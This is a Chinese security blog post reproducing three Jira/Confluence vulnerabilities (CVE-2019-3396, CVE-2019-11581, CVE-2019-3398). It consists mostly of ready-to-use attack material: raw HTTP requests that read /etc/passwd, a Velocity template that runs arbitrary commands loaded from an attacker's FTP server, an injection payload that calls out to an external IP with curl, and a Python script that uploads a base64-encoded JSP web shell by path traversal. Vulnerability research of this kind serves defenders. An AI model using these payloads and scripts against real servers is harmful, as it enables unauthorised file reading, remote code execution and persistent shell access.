<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="漏洞分析,">










<meta name="description" content="任意文件读取（CVE-2019-3396）需要普通用户权限，先登陆后，创建一篇文章，在插入菜单中插入其他宏，搜索youtube，插入小工具连接器。随便找个youtube的视频链接填写需要的相关信息。">
<meta name="keywords" content="漏洞分析">
<meta property="og:type" content="article">
<meta property="og:title" content="Jira系统的3个漏洞复现">
<meta property="og:url" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/index.html">
<meta property="og:site_name" content="大大黄的博客">
<meta property="og:description" content="任意文件读取（CVE-2019-3396）需要普通用户权限，先登陆后，创建一篇文章，在插入菜单中插入其他宏，搜索youtube，插入小工具连接器。随便找个youtube的视频链接填写需要的相关信息。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/2.png">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/1.png">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/3.png">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/6.png">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/4.png">
<meta property="og:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/5.png">
<meta property="og:updated_time" content="2019-11-20T09:03:39.635Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Jira系统的3个漏洞复现">
<meta name="twitter:description" content="任意文件读取（CVE-2019-3396）需要普通用户权限，先登陆后，创建一篇文章，在插入菜单中插入其他宏，搜索youtube，插入小工具连接器。随便找个youtube的视频链接填写需要的相关信息。">
<meta name="twitter:image" content="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/2.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/">





  <title>Jira系统的3个漏洞复现 | 大大黄的博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">大大黄的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lahonja's Blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://lahonja.site/2019/11/20/Jira系统的3个漏洞复现/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="LAHONJA">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="大大黄的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Jira系统的3个漏洞复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-20T16:56:46+08:00">
                2019-11-20
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/漏洞分析/" itemprop="url" rel="index">
                    <span itemprop="name">漏洞分析</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/11/20/Jira系统的3个漏洞复现/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2019/11/20/Jira系统的3个漏洞复现/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.2k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="任意文件读取（CVE-2019-3396）"><a href="#任意文件读取（CVE-2019-3396）" class="headerlink" title="任意文件读取（CVE-2019-3396）"></a>任意文件读取（CVE-2019-3396）</h1><p>需要普通用户权限，先登陆后，创建一篇文章，在插入菜单中插入其他宏，搜索youtube，插入小工具连接器。随便找个youtube的视频链接填写需要的相关信息。</p>
<img src="/2019/11/20/Jira系统的3个漏洞复现/2.png">

<img src="/2019/11/20/Jira系统的3个漏洞复现/1.png">

<a id="more"></a>

<p>下面是插入小工具连接器时会发送的请求：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/rest/tinymce/1/macro/placeholder</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">Content-Length</span>: 183</span><br><span class="line"><span class="attribute">Accept</span>: text/plain, */*; q=0.01</span><br><span class="line"><span class="attribute">Origin</span>: http://confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">X-Requested-With</span>: XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36</span><br><span class="line"><span class="attribute">DNT</span>: 1</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json; charset=UTF-8</span><br><span class="line"><span class="attribute">Referer</span>: http://confluence.xxxxxx.com/pages/resumedraft.action?draftId=22152873&amp;draftShareId=a8556635-28a4-40b1-a2c5-d53e13d93cee</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9,da;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span>: cid=ChMjk13Lwho9PphajTtDAg==; JSESSIONID=855378CA7A99F1153AE84BE8417FA113</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"></span><br><span class="line">&#123;"contentId":"22152872","macro":&#123;"name":"widget","params":&#123;"url":"https://www.youtube.com/watch?v=6qLr1CesJuk","width":"200","height":"200"&#125;,"body":""&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>之后再发送预览的请求，并添加 _template 参数，就可以任意文件读取了</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/rest/tinymce/1/macro/preview</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">Content-Length</span>: 185</span><br><span class="line"><span class="attribute">Accept</span>: text/plain, */*; q=0.01</span><br><span class="line"><span class="attribute">Origin</span>: http://confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">X-Requested-With</span>: XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36</span><br><span class="line"><span class="attribute">DNT</span>: 1</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json; charset=UTF-8</span><br><span class="line"><span class="attribute">Referer</span>: http://confluence.xxxxxx.com/pages/resumedraft.action?draftId=22152873&amp;draftShareId=a8556635-28a4-40b1-a2c5-d53e13d93cee</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9,da;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span>: cid=ChMjk13Lwho9PphajTtDAg==; JSESSIONID=855378CA7A99F1153AE84BE8417FA113</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"></span><br><span class="line">&#123;"contentId":"22152872","macro":&#123;"name":"widget","params":&#123;"url":"https://www.youtube.com/watch?v=6qLr1CesJuk","width":"200","height":"200","_template":"file:///etc/passwd"&#125;,"body":""&#125;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="代码执行（CVE-2019-3396）"><a href="#代码执行（CVE-2019-3396）" class="headerlink" title="代码执行（CVE-2019-3396）"></a>代码执行（CVE-2019-3396）</h1><p>需要普通用户权限，利用的点还是上面任意文件读取的点，由于 _template 支持http/https/ftp等协议，可以加在远程模板，并且Jira后端使用的时 Velocity 服务端模板引擎，在解析时可以导致代码执行。</p>
<p>如果不自己搭建ftp的话，可以使用python开启一个简单的ftp：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip install pyftpdlib</span><br><span class="line">python -m pyftpdlib -<span class="selector-tag">p</span>  <span class="number">8888</span></span><br></pre></td></tr></table></figure>

<p>command.vm:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span> (<span class="variable">$exp</span>=<span class="string">"exp"</span>)</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span> (<span class="variable">$a</span>=<span class="variable">$exp</span>.getClass().forName(<span class="string">"java.lang.Runtime"</span>).getMethod(<span class="string">"getRuntime"</span>,null).invoke(null,null).<span class="built_in">exec</span>(<span class="variable">$command</span>))</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span> (<span class="variable">$input</span>=<span class="variable">$exp</span>.getClass().forName(<span class="string">"java.lang.Process"</span>).getMethod(<span class="string">"getInputStream"</span>).invoke(<span class="variable">$a</span>))</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span>(<span class="variable">$sc</span> = <span class="variable">$exp</span>.getClass().forName(<span class="string">"java.util.Scanner"</span>))</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span>(<span class="variable">$constructor</span> = <span class="variable">$sc</span>.getDeclaredConstructor(<span class="variable">$exp</span>.getClass().forName(<span class="string">"java.io.InputStream"</span>)))</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="built_in">set</span>(<span class="variable">$scan</span>=<span class="variable">$constructor</span>.newInstance(<span class="variable">$input</span>).useDelimiter(<span class="string">"\\A"</span>))</span></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="keyword">if</span>(<span class="variable">$scan</span>.hasNext())</span></span><br><span class="line">    $scan.next()</span><br><span class="line"><span class="meta">#</span><span class="bash">end</span></span><br></pre></td></tr></table></figure>

<p>将上面的模板 command.vm放到目标能访问的ftp上（测试时https不行），再发送下面加载远程模板的包。要执行的命令放在command中：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/rest/tinymce/1/macro/preview</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">Content-Length</span>: 185</span><br><span class="line"><span class="attribute">Accept</span>: text/plain, */*; q=0.01</span><br><span class="line"><span class="attribute">Origin</span>: http://confluence.xxxxxx.com</span><br><span class="line"><span class="attribute">X-Requested-With</span>: XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36</span><br><span class="line"><span class="attribute">DNT</span>: 1</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json; charset=UTF-8</span><br><span class="line"><span class="attribute">Referer</span>: http://confluence.xxxxxx.com/pages/resumedraft.action?draftId=22152873&amp;draftShareId=a8556635-28a4-40b1-a2c5-d53e13d93cee</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9,da;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span>: cid=ChMjk13Lwho9PphajTtDAg==; JSESSIONID=855378CA7A99F1153AE84BE8417FA113</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"></span><br><span class="line">&#123;"contentId":"22152872","macro":&#123;"name":"widget","params":&#123;"url":"https://www.youtube.com/watch?v=6qLr1CesJuk","width":"200","height":"200","_template":"ftp://10.10.20.166:8888/command.vm","command":"id"&#125;,"body":""&#125;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="代码执行（CVE-2019-11581）"><a href="#代码执行（CVE-2019-11581）" class="headerlink" title="代码执行（CVE-2019-11581）"></a>代码执行（CVE-2019-11581）</h1><p>漏洞点：</p>
<ul>
<li>/secure/ContactAdministrators.jspa </li>
<li>/secure/ContactAdministrators!default.jspa </li>
</ul>
<p>在登陆页面的联系网站管理员处，主题一栏存在远程代码执行，时由 Velocity 后端模板引擎导致的。</p>
<ul>
<li><a href="https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247484787&idx=1&sn=6cf924388b42ecdb6ec4ed853fd21273" target="_blank" rel="noopener">漏洞原理参考</a></li>
<li><a href="https://github.com/jas502n/CVE-2019-11581" target="_blank" rel="noopener">漏洞EXP参考</a></li>
</ul>
<img src="/2019/11/20/Jira系统的3个漏洞复现/3.png">

<img src="/2019/11/20/Jira系统的3个漏洞复现/6.png">

<p>Payload:</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',<span class="literal">null</span>).invoke(<span class="literal">null</span>,<span class="literal">null</span>).exec('curl 47.97.112.98:<span class="number">8000</span>//jas502n//').waitFor()</span><br></pre></td></tr></table></figure>

<p>影响版本</p>
<p>4.4.x<br>5.x.x<br>6.x.x<br>7.0.x<br>7.1.x<br>7.2.x<br>7.3.x<br>7.4.x<br>7.5.x<br>7.6.x &lt; 7.6.14<br>7.7.x<br>7.8.x<br>7.9.x<br>7.10.x<br>7.11.x<br>7.12.x<br>7.13.x &lt; 7.13.5<br>8.0.x &lt; 8.0.3<br>8.1.x &lt; 8.1.2<br>8.2.x &lt; 8.2.3</p>
<h1 id="任意文件上传（CVE-2019-3398）"><a href="#任意文件上传（CVE-2019-3398）" class="headerlink" title="任意文件上传（CVE-2019-3398）"></a>任意文件上传（CVE-2019-3398）</h1><p>需要普通用户权限。由于Jira的配置，Jira运行时的缓存及附件目录，不能和其源码在同一个文件夹，所以任意文件上传虽然可以穿越目录，但是必须知道其源码的绝对路径，才能达到 GetShell 的效果。<a href="https://paper.seebug.org/896/#_1" target="_blank" rel="noopener">过程分析及手工上传过程参考</a></p>
<p>注意的是这个漏洞需要2步：</p>
<ul>
<li><p>第一步是在有多个附件的页面上，再上传一个附件</p>
<img src="/2019/11/20/Jira系统的3个漏洞复现/4.png">
</li>
<li><p>第二步在刚刚的页面上，点击下载全部，才能触发</p>
<img src="/2019/11/20/Jira系统的3个漏洞复现/5.png">

</li>
</ul>
<p>Github上的Exp：</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">from bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://127.0.0.1:8090/'</span></span><br><span class="line"></span><br><span class="line">values = &#123;</span><br><span class="line"><span class="string">'os_username'</span>:<span class="string">'admin'</span>,</span><br><span class="line"><span class="string">'os_password'</span>:<span class="string">'password'</span>,</span><br><span class="line"><span class="string">'login'</span>:<span class="string">'Log+in'</span>,</span><br><span class="line"><span class="string">'os_destination'</span>:<span class="string">''</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">'accept'</span>: <span class="string">'*/*'</span>,</span><br><span class="line">    <span class="string">'user-agent'</span>: <span class="string">'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">jspshell = <span class="string">'PCVAIHBhZ2UKaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiJT4KPCUKJT4KPEhUTUw+CjxCT0RZPgo8SDM+SlNQIFNIRUxMPC9IMz4KPEZPUk0gTUVUSE9EPSJHRVQiIE5BTUU9Im15Zm9ybSIKQUNUSU9OPSIiPgo8SU5QVVQgVFlQRT0idGV4dCIgTkFNRT0iY21kIj4KPElOUFVUIFRZUEU9InN1Ym1pdCIgVkFMVUU9IkV4ZWN1dGUiPgo8L0ZPUk0+CjxQUkU+CjwlCmlmIChyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikgIT0gbnVsbCkgewpvdXQucHJpbnRsbigiQ29tbWFuZDogIiArCnJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7ClByb2Nlc3MgcCA9ClJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKT3V0cHV0U3RyZWFtIG9zID0gcC5nZXRPdXRwdXRTdHJlYW0oKTsKSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CkRhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKU3RyaW5nIGRpc3IgPSBkaXMucmVhZExpbmUoKTsKd2hpbGUgKCBkaXNyICE9IG51bGwgKSB7Cm91dC5wcmludGxuKGRpc3IpOwpkaXNyID0gZGlzLnJlYWRMaW5lKCk7Cn0KfQolPgo8L1BSRT4KPC9CT0RZPgo8L0hUTUw+Cg=='</span></span><br><span class="line"></span><br><span class="line">session = requests.Session()</span><br><span class="line">login = session.post(url + <span class="string">'dologin.action'</span>, headers=headers, data=values)</span><br><span class="line">soup = BeautifulSoup(login.<span class="built_in">text</span>, <span class="string">'html.parser'</span>)</span><br><span class="line">csrf_token = soup.select_one(<span class="string">'meta[name="atlassian-token"]'</span>).<span class="built_in">get</span>(<span class="string">'content'</span>,None)</span><br><span class="line">createpage = session.<span class="built_in">get</span>(url + <span class="string">'pages/createpage.action'</span>)</span><br><span class="line">soup = BeautifulSoup(createpage.<span class="built_in">text</span>, <span class="string">'html.parser'</span>)</span><br><span class="line">draft_id = soup.select_one(<span class="string">'meta[name="ajs-draft-id"]'</span>).<span class="built_in">get</span>(<span class="string">'content'</span>,None)</span><br><span class="line"></span><br><span class="line"><span class="built_in">attach</span> = session.post(url + <span class="string">'plugins/drag-and-drop/upload.action?draftId='</span> + draft_id + <span class="string">'&amp;filename=../../../../../../opt/atlassian/confluence/confluence/shell.jsp&amp;size=637&amp;mimeType=text%2fplain&amp;atl_token='</span> + csrf_token, headers=headers,data=base64.b64decode(jspshell))</span><br><span class="line"></span><br><span class="line">downloadallattachments = session.<span class="built_in">get</span>(url + <span class="string">'pages/downloadallattachments.action?pageId='</span> + draft_id, headers=headers)</span><br><span class="line"></span><br><span class="line"><span class="built_in">if</span> downloadallattachments.status_code == <span class="number">200</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'Success! Go to '</span> + url + <span class="string">'shell.jsp for your shell!'</span>)</span><br><span class="line"><span class="built_in">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'Something went wrong. Blame python.'</span>)</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞分析/" rel="tag"># 漏洞分析</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/10/CVE-2019-0808详细分析/" rel="next" title="CVE-2019-0808详细分析">
                <i class="fa fa-chevron-left"></i> CVE-2019-0808详细分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">LAHONJA</p>
              <p class="site-description motion-element" itemprop="description">网络安全 CTF 内网渗透 取证分析</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            
            <br>
            <br>
            <div class="site-state-item site-state-posts" style="border-left:none;">
                  <span class="site-state-item-count" id="busuanzi_value_site_pv"></span>
                  <span class="site-state-item-name">浏览量</span>
            </div>
            <div class="site-state-item site-state-posts">
                  <span class="site-state-item-count" id="busuanzi_value_site_uv"></span>
                <span class="site-state-item-name">访客量</span>
            </div>
            <div class="site-state-item site-state-posts">
                  <span class="site-state-item-count">19.8k</span>
                  <span class="site-state-item-name">总字数</span>
            </div>
          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#任意文件读取（CVE-2019-3396）"><span class="nav-number">1.</span> <span class="nav-text">任意文件读取（CVE-2019-3396）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码执行（CVE-2019-3396）"><span class="nav-number">2.</span> <span class="nav-text">代码执行（CVE-2019-3396）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码执行（CVE-2019-11581）"><span class="nav-number">3.</span> <span class="nav-text">代码执行（CVE-2019-11581）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#任意文件上传（CVE-2019-3398）"><span class="nav-number">4.</span> <span class="nav-text">任意文件上传（CVE-2019-3398）</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LAHONJA</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
